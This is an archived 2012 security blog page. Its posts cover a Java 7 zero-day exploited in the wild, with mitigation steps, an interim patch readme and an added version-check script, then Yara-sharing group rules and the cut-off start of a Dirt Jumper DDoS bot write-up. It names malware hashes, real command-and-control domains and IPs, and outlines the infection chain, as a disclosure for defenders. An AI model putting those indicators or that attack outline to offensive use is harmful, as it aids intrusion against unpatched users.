<a href="http://www.kb.cert.org/vuls/id/636312">Aug. 28 US CERT: We are currently unaware of a practical solution to this problem. Disable Java in your browser</a><br />
<br />
<b style="background-color: #4f626e; color: #daf1ff; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px; line-height: 20px; text-align: center;"><a href="http://zulu.zscaler.com/research/java_version.html" style="color: #fbb917; text-decoration: none;" target="_blank">CLICK HERE TO SEE IF YOU ARE VULNERABLE</a> (Zscaler) </b>
<br />
<br />
The Zscaler tool checks the version of Java used by your browser. If it is below 1.7_7, you need to update it from Java.com. If it is 1.7_7 already, you are safe (for now). As of Aug 31, 2012, the Zscaler checker prints "vulnerable for 0-day" for ALL versions above 1.6; they just need to update the tool. In reality, if you have the latest version of Java, you are not vulnerable to this exploit.<br />
In general, you don't need the Java plug-in in your browser; it is best to keep it turned off. You can still use Java desktop apps.<br />
<br />
<br />
<b style="background-color: #4f626e; color: #daf1ff; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-small; line-height: 15px;"><a href="http://sempersecurus.blogspot.com/" style="color: #fbb917; text-decoration: none;">Andre' M. DiMino</a> and <a href="http://contagiodump.blogspot.com/" style="color: #fbb917; text-decoration: none;">Mila Parkour</a></b><br />
</div>
</div>
</div>
Mila Parkour<br />
<b>Java 7 0-Day vulnerability information and mitigation.</b> (published 2012-08-27, updated 2012-08-31)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<span style="color: #f1c232; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><b>Update Aug.30, 2012</b></span></span><br />
<a href="http://www.oracle.com/technetwork/java/javase/7u7-relnotes-1835816.html" target="_blank">Oracle issued update 7 (7u7), which fixed the vulnerability</a>.</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggVS3ncBNg1Qpr937PvPNP2KZZvsv0EDhZHDM5Y1YkXeI_byaLIwnzYWkWg6a2ZVEzrxzMayp5R4KuJRyii5j9qYQM3yMYfrPzZ7xR7K8AeklMe_Ftlv5MrcrY5rwCVPbVuZGjkZSwYkwU/s1600/storm.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggVS3ncBNg1Qpr937PvPNP2KZZvsv0EDhZHDM5Y1YkXeI_byaLIwnzYWkWg6a2ZVEzrxzMayp5R4KuJRyii5j9qYQM3yMYfrPzZ7xR7K8AeklMe_Ftlv5MrcrY5rwCVPbVuZGjkZSwYkwU/s200/storm.jpg" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: right;"><span style="font-size: xx-small;">img.kids.discovery.com</span>
</td></tr>
</tbody></table>
The cat is out of the bag. There is a 0-day out there currently being used in targeted attacks. The number of these attacks has been relatively low, but it is likely to increase, because this is a fast and reliable exploit that can be used in drive-by attacks and in all kinds of links in emails. Interestingly, <a href="https://twitter.com/MarkWuergler/statuses/233919816463941632">Mark Wuergler mentioned on August 10</a> that the VulnDisco SA CANVAS exploit pack now has a new Java 0-day. It makes you wonder whether this is the same exploit, either leaked from CANVAS or found in the wild and then added to the CANVAS pack, or whether it is totally unrelated and there are now two 0-day exploits.<br />
<br />
The purpose of this post is not to provide the vulnerability analysis or samples, but to offer additional information that may help prevent infections on some targeted networks. <a href="http://krebsonsecurity.com/2012/03/new-java-attack-rolled-into-exploit-packs/">We all know what kind of damage Java vulnerabilities can cause</a> if used in drive-by exploits or in exploit packs. We believe that revealing technical vulnerability details in the form of a detailed technical analysis before the patch is dangerous, and releasing working exploits before the patch is vain and irresponsible.<br />
<br />
The Oracle patch cycle is 4 months (middle of February, June, October), with bugfixes 2 months after the patch. The next patch day is October 16 - almost two months away. Oracle <a href="http://threatpost.com/en_us/blogs/sun-about-face-out-cycle-java-update-patches-critical-flaw-041510">almost never issues</a> out-of-cycle patches, but hopefully they will consider this serious enough to do so this time.<br />
<br />
We have been in contact with <a href="http://schierlm.users.sourceforge.net/">Michael Schierl</a>, the Java expert who discovered a number of Java vulnerabilities, including the recent Java Rhino CVE-2011-3544 / ZDI-11-305 and CVE-2012-1723. We asked him to have a look at this latest exploit. Michael sent his detailed analysis, which we will publish in the near future, and a patch, which we offer on a per-request basis today.<br />
<br />
<strike> The reason for limited release is the fact that this patch can be reversed, thus making the job of exploit creation easier, which certainly is not our goal.</strike><br />
Update Aug.29<br />
<i style="background-color: #4f626e; color: #daf1ff; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14px; line-height: 20px;">At this point the patch is by request, not to preserve the code but to limit it to IT administrators and developers who can test and decide if they want to deploy. We do not want to push/offer it to 3 billion end Java users; it wasn't tested in all the possible scenarios and systems.</i><br />
<br />
<a href="http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html">Atif Mushtaq from FireEye</a> covered the payload part of the exploit, which is helpful and something to look out for if you are protecting your network or your customers. We should note that attackers are not limited to .net addresses and already used other domains and IP addresses.<br />
<br />
The malicious executable name varies, and in the future it may be replaced by any kind of payload. At this point, it appears to be a Poison Ivy RAT variant that is likely to be detected by many antivirus vendors. <br />
<br />
More about Poison Ivy<br />
<a href="http://labs.alienvault.com/labs/index.php/2012/nmap-script-to-detect-poison-ivy-clients/">Alienvault Nmap Script to detect Poison Ivy Clients</a><br />
<a href="http://hbgary.com/attachments/detectingpoisonivy.pdf">Will Brown: Detecting Poison Ivy </a><br />
<br />
<b>Details about the exploited vulnerability, mitigation factors and tips.</b><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd_-o1ySPidhNjMVYWmrsnoLVxPL88p661T5G9clZbIDw2tjIa4289tamtrxvHMF8OUQv614KJfCm4H0T3kA0b_CJBHtcQgjPnpVmVjMMyiIv-fBbQxU9fSS7ijA51Hhze73csLhD1p560/s1600/javaloading.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd_-o1ySPidhNjMVYWmrsnoLVxPL88p661T5G9clZbIDw2tjIa4289tamtrxvHMF8OUQv614KJfCm4H0T3kA0b_CJBHtcQgjPnpVmVjMMyiIv-fBbQxU9fSS7ijA51Hhze73csLhD1p560/s1600/javaloading.jpg" /></a>1. The JavaScript in index.html is heavily obfuscated.<br />
2. This vulnerability affects Java 7 (1.7) Update 0 to 6. It does NOT affect Java 6 and below.<br />
3. It works in all common browsers <strike>versions of Internet Explorer, Firefox, and Opera</strike>. <strike>Does NOT work in Chrome</strike>. <i>(Update: The original exploit we tested did not affect Chrome. We did not test Metasploit, but reports are that their module works for all browsers. Disable Java support in your browser.)</i><br />
4. It does not crash browsers (which does NOT mean it does not work!). The landing page looks like a blank page <i>(for the original exploit only; future variants may be different)</i>; sometimes one may see a flash of a rotating Java logo and the word "Loading".<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTQGUEZO_EzIMhGMODzDRHJNY8Y6eTyDmyJ03KIKv9uB1tihEUA3wwVO_8uMy5a0TI5CgDT9J8hXo6TqO0nK32mQdx56QAb7BQxyit3_PhCLkhVWEma0KxRl16cUezHUMMwSu4qYt72PV-/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTQGUEZO_EzIMhGMODzDRHJNY8Y6eTyDmyJ03KIKv9uB1tihEUA3wwVO_8uMy5a0TI5CgDT9J8hXo6TqO0nK32mQdx56QAb7BQxyit3_PhCLkhVWEma0KxRl16cUezHUMMwSu4qYt72PV-/s320/3.png" width="320" /></a></div>
5. The malicious Java applet is downloaded as you see in the picture below. At this point, if your system is not vulnerable or is patched, the attack stops. From the user's perspective, it is impossible to tell whether the attack was successful or not.<br />
6. If the exploit is successful, it downloads and executes a malicious binary, which calls out to another domain/IP address: hello.icon.pk / 223.25.233.244 <br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTizzTBllo08sJ18hHwGXOHwO6mrmvVYDI1TiFh6r-EgUy1cuhvPqu2W7g35N15iCavj9sIbG6_mHjiiMV77vNE54KyF8eyMlCBTjy62pHmt9b2LfeQrZvYOsKLM0sR4y2qSEhPOLZFlAF/s1600/unpatchedie.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTizzTBllo08sJ18hHwGXOHwO6mrmvVYDI1TiFh6r-EgUy1cuhvPqu2W7g35N15iCavj9sIbG6_mHjiiMV77vNE54KyF8eyMlCBTjy62pHmt9b2LfeQrZvYOsKLM0sR4y2qSEhPOLZFlAF/s400/unpatchedie.png" width="290" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">img.1</td></tr>
</tbody></table>
7. Although older Java is not vulnerable to this attack, downgrading is not recommended due to many other vulnerabilities in the older versions of Java.<br />
8. Disable Java in your browser, apply the patch (see below), or <strike>use Chrome.</strike><br />
<br />
<b>Malware behavior and indicators</b><br />
Payload: hi.exe, Size: 16896<br />
MD5: 4A55BF1448262BF71707EEF7FC168F7D <a href="https://www.virustotal.com/file/09d10ae0f763e91982e1c276aad0b26a575840ad986b8f53553a4ea0a948200f/analysis/">(Virustotal 26/42)</a><br />
<br />
<ol>
<li>The legitimate Portable Media Serial Number Service <b><span style="font-family: Courier New, Courier, monospace;">MsPMSNSv.dll</span></b> is deleted from C:\WINDOWS\system32 <a href="https://www.virustotal.com/file/1dea8005220a3efec6e32a7de4386026ccc1e5328e2fdcb82b1fb335905d1962/analysis/">(Virustotal 0/42)</a></li>
<li>A malicious <span style="font-family: Courier New, Courier, monospace;"><b>mspmsnsv.dll </b></span>is copied to C:\WINDOWS\system32 <a href="https://www.virustotal.com/file/3564e5fbd74ed4e6c129b8209fae3daa126e7bd422625ad02d617bde9c6c42fe/analysis/">(Virustotal 21/42)</a></li>
<li>The "Portable Media Serial Number Service" (WmdmPmSN in the registry) is running.</li>
</ol>
<b><span style="color: #ffe599;">Update Aug 30, 2012 </span></b><br />
<b><span style="color: #ffe599;">The vulnerability has been patched today. Please see the note on the top of the post.</span></b><br />
<b><strike>Patch Readme:</strike></b><br />
<blockquote class="tr_bq">
Java 7 Zero Day Buster<br />
by Michael 'mihi' Schierl, &lt;schierlm at gmx.de&gt;, http://schierlm.users.sourceforge.net/<br />
To use, locate the <span style="font-family: Courier New, Courier, monospace;">(jre/)lib/security</span> folder in your JDK/JRE (there should be a file called <span style="font-family: Courier New, Courier, monospace;">cacerts</span> in it), create a folder <span style="font-family: Courier New, Courier, monospace;">(jre/)lib/endorsed</span> next to it and place this Jar inside it.</blockquote>
<blockquote class="tr_bq">
The Java VM will load all Jar files in this folder and replace any of its own runtime classes (from rt.jar) by .class files inside of these Jars. Note that this feature is not officially supported by Sun/Oracle except for updating XML parser libraries, but it seems to work.</blockquote>
<blockquote class="tr_bq">
Use this Jar only for Java 7 Update 0 to 6, as other versions may have a different version of the patched class and break horribly. The patch seems to properly block the access vector used by the 0-day circulating at the moment, but I take no responsibility that it fixes all ways this bug can be exploited, nor that it will not break any other existing Java programs.</blockquote>
In other words, create a folder under<span style="color: #f1c232;"> <span style="font-family: Courier New, Courier, monospace;">lib</span></span> in your Java 7 program folder, name it <span style="color: #f1c232; font-family: Courier New, Courier, monospace;">endorsed</span>, copy the patch jar in it and restart the browser(s).<br />
We tested it and it works well - the applet gets downloaded but does not lead to the download and execution of the malicious binary. See the pictures below and compare them with the download sequence during the successful exploit (img. 1).<br />
<div style="text-align: center;">
<b> Interim patch results </b></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxq9EV6t7bdOSVarlcK5yQKNQ0hGPvVsJhY05mi8aruw8VfgiMG3D11VJQ-PCT-sLZ2sR1kGR_EKsQdbGOQXNA4UMb86K1UQL7F1leL3pzqJd5Z34i_AArhLO6esEa6GJ2PDVlb-gU6NYD/s1600/patchedie.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxq9EV6t7bdOSVarlcK5yQKNQ0hGPvVsJhY05mi8aruw8VfgiMG3D11VJQ-PCT-sLZ2sR1kGR_EKsQdbGOQXNA4UMb86K1UQL7F1leL3pzqJd5Z34i_AArhLO6esEa6GJ2PDVlb-gU6NYD/s400/patchedie.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Patched Java 7 with Internet Explorer. No malicious exe download.</td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXRkXkrQBkVcdMcozWaijmm-U9nA1cpRVQqdaSu7Uo0_Vc8Vv6kDHnCkXcAl5dWpXdTRt4q3R_tV6v4EZDWv0iOarbxImucc1YfRSBNz0g_VXM8nmrGeWd9YR0O8HAoHqxwOwKnHN4ilo4/s1600/firefoxpatched.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXRkXkrQBkVcdMcozWaijmm-U9nA1cpRVQqdaSu7Uo0_Vc8Vv6kDHnCkXcAl5dWpXdTRt4q3R_tV6v4EZDWv0iOarbxImucc1YfRSBNz0g_VXM8nmrGeWd9YR0O8HAoHqxwOwKnHN4ilo4/s400/firefoxpatched.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Patched Java 7 with Firefox. No malicious exe download.</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfwivNb5nyxCLF4Fn4f1Z4V7KNAP1SuVnQLOhLQTd4yrO398cRKVX68pOUz90RjvnYMaNmAuQ6cBmqtq4tT3KUQk8ouGwV8t-Pq1G7no08k1VRgT0dkneslOvzPNz8GnJTsuwfhOE1jQxx/s1600/chrome.JPG" imageanchor="1"><img border="0" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfwivNb5nyxCLF4Fn4f1Z4V7KNAP1SuVnQLOhLQTd4yrO398cRKVX68pOUz90RjvnYMaNmAuQ6cBmqtq4tT3KUQk8ouGwV8t-Pq1G7no08k1VRgT0dkneslOvzPNz8GnJTsuwfhOE1jQxx/s1600/chrome.JPG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Java permission request on Chrome</td></tr>
</tbody></table>
<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioZexhurw2xwcufUs7C2-AObleE4ACMKpC43ukqFHManCmiFySiJVltcvNEadsFXyTgKoGqqlDsEr3WZwAf2zeODzUAG4LSUFSqbaHg_xatLNPg19Zz5UTfWAwp19XCifSnlFA8COsNleT/s1600/chrome2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioZexhurw2xwcufUs7C2-AObleE4ACMKpC43ukqFHManCmiFySiJVltcvNEadsFXyTgKoGqqlDsEr3WZwAf2zeODzUAG4LSUFSqbaHg_xatLNPg19Zz5UTfWAwp19XCifSnlFA8COsNleT/s400/chrome2.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Win XP sshot. No malicious exe download on Chrome (tested on XP and Windows 7)</td></tr>
</tbody></table>
<br />
<a href="https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day">Rapid7 / Metasploit </a>indicate that they tested their module on Chrome on Windows XP. In our experience, if Java is allowed to run as you see in the picture above, the malicious binary does not get downloaded. We tested several times with the same results - Java runs, but there is no contact with the second server and no binary download. Testing on the same VM with Internet Explorer or Firefox immediately causes infection. We don't know; maybe Rapid 7 'improved' the exploit, and you can send them your thanks if you wish, but the original exploit does not work on Chrome.<br />
<b><br /></b>
<b>Requesting the patch:</b><br />
<br />
This is not an official patch and had limited testing. In general, it is best to disable Java in your browser <strike>or use Chrome.</strike><br />
If you are in an environment where you must have Java with Internet Explorer, Firefox or Opera, email us at<span style="color: #ffd966;"> <b>admin &lt;at&gt; deependresearch.org</b></span> from your company address with a brief explanation of the planned use and we will send you the download link.<br />
<br />
If you are in the exploit making business,'whitehat' or not, please do not bother.<br />
If you are a home user and/or do not need to use it to protect users, customers, and networks, please use the workarounds.<br />
<br />
Feel free to contact Oracle and ask them about their patch cycles. You can also contact Rapid 7 and ask if they ever heard of "<a href="http://en.wikipedia.org/wiki/Social_responsibility">Social responsibility</a>" .<br />
<br />
We want to thank Michael 'mihi' Schierl for his analysis and patch development and anonymous for the sample donation.<br />
<br />
<b style="text-align: center;"><a href="http://zulu.zscaler.com/research/java_version.html" style="text-align: center;" target="_blank">CLICK HERE TO SEE IF YOU ARE VULNERABLE</a> (Zscaler) </b><br />
<br />
The Zscaler tool checks the version of Java used by your browser. If it is below 1.7_7, you need to update it from <a href="http://java.com/">Java.com</a>. If it is 1.7_7 already, you are safe (for now). As of Aug 31, 2012, the Zscaler checker prints "vulnerable for 0-day" for ALL versions above 1.6; they just need to update the tool. In reality, if you have the latest version of Java, you are not vulnerable to this exploit.<br />
In general, you don't need the Java plug-in in your browser; it is best to keep it turned off. You can still use Java desktop apps.<br />
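Added example, not code from this post or from Michael Schierl's patch: a Python helper that decides from <span style="font-family: Courier New, Courier, monospace;">java -version</span> output whether an installation falls into the affected range the post lists (Java 7 Update 0 to 6, so 7u7 is reported safe, unlike the Zscaler checker's current behaviour) and stages the interim patch Jar under (jre/)lib/endorsed the way the patch readme describes. The function names, the version regex and the constructed demo directory layout are assumptions of this example.

```python
"""Added example, not code from the post or from Michael Schierl's patch.

Decides from `java -version` output (or a plain version string such as
"1.7_7" as the post writes it) whether an installation falls into the
range the post lists as affected by CVE-2012-4681, Java 7 Update 0 to 6,
and stages the interim patch Jar under (jre/)lib/endorsed the way the
readme describes. Function names, the regex and the demo layout are
assumptions of this example.
"""
import os
import re
import shutil
import tempfile

# Matches "1.7.0_06", "1.7.0_06-b24", "1.7.0" (update 0) and the short
# "1.7_7" form; micro and update are optional groups.
_VERSION_RE = re.compile(r'(\d+)\.(\d+)(?:\.(\d+))?(?:_(\d+))?')


def parse_java_version(text):
    """Return (major, minor, micro, update) from `java -version` output.

    Missing micro/update components default to 0, so "1.7.0" is 7u0."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError("no Java version found in: %r" % text)
    major, minor, micro, update = m.groups()
    return int(major), int(minor), int(micro or 0), int(update or 0)


def is_affected_cve_2012_4681(text):
    """True only for Java 7 Update 0 through 6.

    A check that flags everything above 1.6 (what the post reports the
    Zscaler page doing on Aug 31) would also flag the fixed 7u7; this
    check reports 7u7 and later, and Java 6 and below, as not affected."""
    major, minor, _micro, update = parse_java_version(text)
    return (major, minor) == (1, 7) and update <= 6


def locate_jre_lib(java_home):
    """Find the lib directory that holds security/cacerts, as the readme
    says: <jre>/lib/security for a JRE, <jdk>/jre/lib/security for a JDK."""
    for lib in (os.path.join(java_home, "lib"),
                os.path.join(java_home, "jre", "lib")):
        if os.path.isfile(os.path.join(lib, "security", "cacerts")):
            return lib
    raise RuntimeError("no lib/security/cacerts under %s; wrong Java dir?"
                       % java_home)


def install_endorsed_patch(java_home, patch_jar, version_text):
    """Copy the patch Jar into lib/endorsed next to lib/security.

    Refuses unless the version is 7u0-7u6, since the readme warns that
    other versions carry a different copy of the patched class."""
    if not is_affected_cve_2012_4681(version_text):
        raise RuntimeError("patch is for Java 7 Update 0-6 only; refusing")
    lib = locate_jre_lib(java_home)
    endorsed = os.path.join(lib, "endorsed")
    os.makedirs(endorsed, exist_ok=True)
    dest = os.path.join(endorsed, os.path.basename(patch_jar))
    shutil.copyfile(patch_jar, dest)
    return dest


def run_demo():
    """Build a constructed JDK-style layout in a temp dir and exercise the
    installer; returns (endorsed jar path, refused_for_7u7)."""
    root = tempfile.mkdtemp(prefix="jdk7demo-")
    security = os.path.join(root, "jre", "lib", "security")
    os.makedirs(security)
    open(os.path.join(security, "cacerts"), "wb").close()  # constructed
    jar = os.path.join(root, "patch.jar")  # placeholder name for the Jar
    with open(jar, "wb") as fh:
        fh.write(b"PK\x03\x04")  # constructed stand-in for the patch Jar
    dest = install_endorsed_patch(root, jar, 'java version "1.7.0_06"')
    try:
        install_endorsed_patch(root, jar, 'java version "1.7.0_07"')
        refused = False
    except RuntimeError:
        refused = True
    return dest, refused


if __name__ == "__main__":
    for sample in ('java version "1.6.0_33"', 'java version "1.7.0_06"',
                   'java version "1.7.0_07"', "1.7_7"):
        print(sample, "->", "AFFECTED" if is_affected_cve_2012_4681(sample)
              else "not affected")
    print(run_demo())
```

Restart the browser(s) after copying the Jar, as the post says; the demo writes only into a temporary directory.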
<br />
<br />
<b>Continue to Part II <a href="http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html"> Java 7 0-Day vulnerability analysis </a></b><br />
<div>
<br />
<span style="font-size: x-small;"><b><a href="http://sempersecurus.blogspot.com/">Andre' M. DiMino</a> and <a href="http://contagiodump.blogspot.com/">Mila Parkour</a></b></span>
</div>
</div>
Mila Parkour<br />
<b>Yara Signature Exchange Google Group</b> (published 2012-08-08, updated 2014-05-13)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO8-BkCQvcEBXcr524otq87rLsF0ejLaPh5XtST7XTZKPcTbmXQzjU7mIrdiaqsOt5QhWQBzn4ELquTQ7nSTnf1mrZubBAMaqwUspAWFNZkwbfr_KDljGqhiw4tHF-w4tJTU1vFOui3EYE/s1600/yaraexchange.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO8-BkCQvcEBXcr524otq87rLsF0ejLaPh5XtST7XTZKPcTbmXQzjU7mIrdiaqsOt5QhWQBzn4ELquTQ7nSTnf1mrZubBAMaqwUspAWFNZkwbfr_KDljGqhiw4tHF-w4tJTU1vFOui3EYE/s320/yaraexchange.png" height="69" width="320" /></a><b>Yara-Exchange Google Group (by invitation only)</b><br />
<a href="https://groups.google.com/d/forum/yaraexchange">https://groups.google.com/d/forum/yaraexchange</a>
<br />
<br />
<br />
<br />
Please read the <b><span style="color: #bf9000;">Yara Exchange Group rules below</span></b> and, if you are interested, request an invitation by sending an email from your organization's email account to <b>Yara &lt;at&gt; deependresearch.org</b> (currently moderated by <a href="http://sempersecurus.blogspot.com/">Andre' M. DiMino</a>)<br />
<br />
Please provide the following information:<br />
<ul style="text-align: left;">
<li>Your First &amp; Last Name (may not be a third party contact)</li>
<li>Your Organization and Address</li>
<li>Contact information for verification.</li>
</ul>
<b>Once your membership is confirmed we will need your</b>
<ul style="text-align: left;">
<li>Gmail Email address in order to join the Google group. </li>
<li>Github ID (create one at Github.com if you don't have one) </li>
<li>Virustotal.com ID (create one at virustotal.com if you don't have one) <i>- optional but recommended</i></li>
</ul>
<i>You can send this information in the initial application email.</i><br />
<div>
In short, we need name, work and Gmail email addresses, organization, and full contact info (City, Country). The requirement to use your work email for the initial request is mandated by the fact that not all indicators can be publicly shared.<br />
<br />
By registration, you agree that your group access will be used only by the person registered. No other distribution or public disclosure of this group's signatures is permitted. Although signatures shared will not be posted in public, please make sure that all information you send to this group comes from your own research, open sources, or you have permission (from other groups / researchers or your employer) to share it with the group.<br />
<br />
We are planning to have both crimeware and APT yara signatures. We can create an upload/malware hosting if necessary.<br />
<br />
<br />
Read more about Yara here<br />
<a href="http://code.google.com/p/yara-project/">http://code.google.com/p/yara-project/</a>
<br />
and a good explanation is <a href="http://blog.zeltser.com/post/4339793582/custom-signatures-for-malware-scan">here by Lenny Zeltser </a><br />
<br />
<br />
<b><span style="color: #f1c232; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Yara Exchange Group Rules</span></b><br />
<br />
1. DeepEnd Research is an all volunteer, non-commercial organization that derives no financial benefit from Yara signatures or anything else developed by the group. Our goal is to build a community of researchers with a mutual interest in developing, improving, and sharing Yara signatures.<br />
<br />
2. It's expected and required that <span style="color: #f1c232; font-family: inherit;"><b>everyone</b></span> will contribute to the list. "Yara Exchange" isn't there to just pull signatures or watch the conversations and not contribute anything back. While some initial silence is understood until our momentum builds, extended lack of participation won't be accepted.<br />
Contributing to the list can come in many forms including new signatures, improvements on existing signatures, tool integration using yara, analysis and classification techniques using yara, etc.<span style="color: #f1c232;"> <b>If you cannot share any signatures you develop or do not use yara often enough to contribute, please do not apply. </b></span><br />
<br />
3. Inactive members, or those that don't tangibly contribute to the signature development or sharing will be pinged to check on their status and removed after 3 months.<br />
<br />
4. A group roster will be distributed to group members on a regular basis. We believe that the roster will let us have more trust in each other, and a better understanding of who you are sharing your signatures with. The roster will consist of the list members and their organizations (Google group nick+real name+org/company). No email addresses, titles, or other personal information will be included. DeepEnd Research will never use your information for reasons not specified above.<br />
<br />
5<br />
a. Group access is granted only to the person registered. If you have colleagues and friends that you feel will be a good part of this group, have them request their own access.<br />
<br />
b. No sharing, distribution, or public disclosure of this group's signatures, analysis, or work product outside of the member's organization or "Yara Exchange" is permitted. Additionally, no signatures, analysis, or work product from "Yara Exchange" can be used commercially, or for other financial benefit, either directly or indirectly.<br />
<b>Usage explanation and examples:</b><br />
-You can use yara signatures produced by the group for operations at your company / organization and/or for incident response at your user / client / customer site.<br />
-You may not incorporate signatures shared by group members into any products / appliances / subscriptions / reports you sell or publications you produce.<br />
-You maintain ownership of signatures you create and submit to the group and you can use / sell them in any way you wish.<br />
If there are any questions or uncertainties about external use of "Yara Exchange" information, please ask!<br />
<br />
c. Please ensure that all information you share with "Yara Exchange" comes from your own research, open sources, or with permission. <br />
<br />
We hope these rules will prevent group stagnation and taking advantage of a few active participants by many idle members and companies. We look forward to working with you and hope this group develops and thrives. </div>
</div>
Mila Parkourhttp://www.blogger.com/profile/05026389826489033821noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-11645623857005662612011-10-19T14:42:00.053-04:002011-10-19T14:58:10.552-04:00Dirt Jumper DDoS Bot - New versions, New targets<div style="font-family: Verdana,sans-serif;"><div><span style="font-size: small;">By <a href="http://sempersecurus.blogspot.com/">Andre' M. DiMino</a> & <a href="http://contagiodump.blogspot.com/">Mila Parkour</a></span><br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm5cmmon85ownx8IZ78wcDbUhjZSWJ_QhkZjxGuo22TQF5ugyddncaNZWzJ1qMFA9gCsgDui1MDB4Mp8fa02dJrfeI0vlT2J3c3FvN7ZU5r_p8hkio6NC9H3lNHEmXssi0fFounhUHC2DV/s1600/wipeout.jpg" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm5cmmon85ownx8IZ78wcDbUhjZSWJ_QhkZjxGuo22TQF5ugyddncaNZWzJ1qMFA9gCsgDui1MDB4Mp8fa02dJrfeI0vlT2J3c3FvN7ZU5r_p8hkio6NC9H3lNHEmXssi0fFounhUHC2DV/s200/wipeout.jpg" width="200" /></a></span></td></tr>
<tr align="right" style="color: #999999;"><td class="tr-caption"><span style="font-size: xx-small;">End-2012.com</span></td></tr>
</tbody></table><span style="font-size: small;">I recently encountered a malware sample that, when sandboxed, exhibited a great deal of DDoS-like activity toward a large number of URLs. When I looked at the network traffic a bit more closely, it reminded me of the Dirt Jumper DDoS bot that I read about in an excellent <a href="http://asert.arbornetworks.com/2011/08/dirt-jumper-caught/">blog post by Curt Wilson</a> of Arbor Networks. This particular version of Dirt Jumper is attacking a variety of organizations and companies in many different countries. The MD5 of this sample is f29b1089b3f5e076d4d4bd2a3a02d3cb; it uses the domain 'asdaddddaaaa.com' for its Command and Control (C&C). Searching for a similar network traffic pattern yielded a number of sandbox analysis pages containing several more C&C servers and DDoS victims. This research also highlighted a lack of proper detection of this bot variant. Many antivirus companies change the name of this bot across variants, <a href="http://www.virustotal.com/file-scan/report.html?id=02422d93668f19b8057064998e228316a2a2ff9c8aacb2968c9567da21e48dd6-1315528286%20">detecting it as zbot, pinkslipbot, Kryptic and others</a>. </span><span style="font-size: small;">Microsoft at least consistently detects Dirt Jumper as Dishigy.B (Dishigy.A is an unrelated keylogger with a binary in the same directory), and 